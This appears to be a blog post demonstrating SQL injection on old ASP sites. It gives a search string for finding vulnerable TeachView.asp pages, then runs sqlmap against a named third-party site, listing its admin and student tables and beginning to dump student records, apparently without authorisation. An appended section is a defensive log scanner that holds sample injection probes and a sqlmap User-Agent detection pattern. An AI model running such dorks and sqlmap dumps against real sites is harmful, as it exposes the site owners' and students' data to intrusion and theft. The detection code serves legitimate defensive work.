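A simple SQL injection example

Many old ASP sites are vulnerable to SQL injection. Searching Google for inurl:TeachView.asp turns up many small sites with this problem. A brief demonstration follows.

Tool used: sqlmap

sqlmap -u http://www.lcztxx.com/TeachView.asp?id=23 attempts the SQL injection.

sqlmap -u http://www.lcztxx.com/TeachView.asp?id=23 --tables lists all the database tables.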

Database: Microsoft_Access_masterdb
[6 tables]
+----------+
| admin    |
| feedback |
| menu     |
| news     |
| school   |
| student  |
+----------+

sqlmap -u http://www.lcztxx.com/TeachView.asp?id=23 --dump attempts to dump the database.

[20:46:17] [INFO] retrieved: id
[20:46:18] [INFO] retrieved: title
[20:47:12] [INFO] retrieved: cname
[20:48:03] [INFO] retrieved: content
[20:49:19] [INFO] retrieved: num

[20:51:59] [INFO] fetching entries for table 'student' in database 'Microsoft_Access_masterdb'
[20:51:59] [INFO] fetching number of entries for table 'student' in database 'Microsoft_Access_masterdb'
[20:51:59] [INFO] retrieved: 9
[20:52:05] [INFO] fetching number of distinct values for column 'id'
[20:52:05] [INFO] retrieved: 9
[20:52:11] [INFO] using column 'id' as a pivot for retrieving row data
[20:52:11] [INFO] retrieved: 10
[20:52:20] [INFO] retrieved: 470
[20:52:30] [INFO] retrieved: Student
[20:52:51] [INFO] retrieved:
[20:52:51] [INFO] retrieved: <img src="../upload/2014611528324449954.jpg"

It is rather slow, so I stopped here…
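
From the site owner's side, the same activity is visible in the web server log. The following is an added example, not part of the original post: it scans IIS W3C log lines for requests to TeachView.asp whose id is not a plain integer, and for sqlmap's default User-Agent. The log lines, IP addresses, field layout and the assumption that id is always a numeric record key are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log lines (not from the original post); documentation IPs.
FIELDS = "date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status".split()
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2014-06-12 20:40:01 GET /TeachView.asp id=23 198.51.100.7 Mozilla/5.0 200
2014-06-12 20:46:17 GET /TeachView.asp id=23%20AND%201=1 203.0.113.9 sqlmap/1.0-dev+(http://sqlmap.org) 200
2014-06-12 20:46:18 GET /TeachView.asp id=23%27 203.0.113.9 Mozilla/5.0 500
2014-06-12 20:47:00 GET /index.asp - 198.51.100.7 Mozilla/5.0 200
"""

# Assumption: these pages take only integer record keys in the listed parameters.
INT_PARAMS = {"/teachview.asp": ("id",)}
INTEGER = re.compile(r"[0-9]{1,10}")


def suspicious_requests(log_text):
    """Return (client_ip, time, reasons) for each request worth reviewing."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip blank lines and W3C directives
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue  # malformed or differently configured line
        rec = dict(zip(FIELDS, parts))
        reasons = []
        # ASP treats query-string names case-insensitively, so normalise them.
        params = {k.lower(): v for k, v in
                  parse_qs(rec["cs-uri-query"], keep_blank_values=True).items()}
        for name in INT_PARAMS.get(rec["cs-uri-stem"].lower(), ()):
            for value in params.get(name, []):
                if not INTEGER.fullmatch(value):
                    reasons.append(f"non-numeric {name}")
        if rec["cs(User-Agent)"].lower().startswith("sqlmap"):
            reasons.append("sqlmap user-agent")
        if reasons:
            findings.append((rec["c-ip"], rec["time"], reasons))
    return findings


if __name__ == "__main__":
    for ip, when, reasons in suspicious_requests(SAMPLE_LOG):
        print(ip, when, ", ".join(reasons))
```

The same integer-only rule, enforced in the page itself before the value reaches the query, is what closes the hole; the log check only shows who has been probing it.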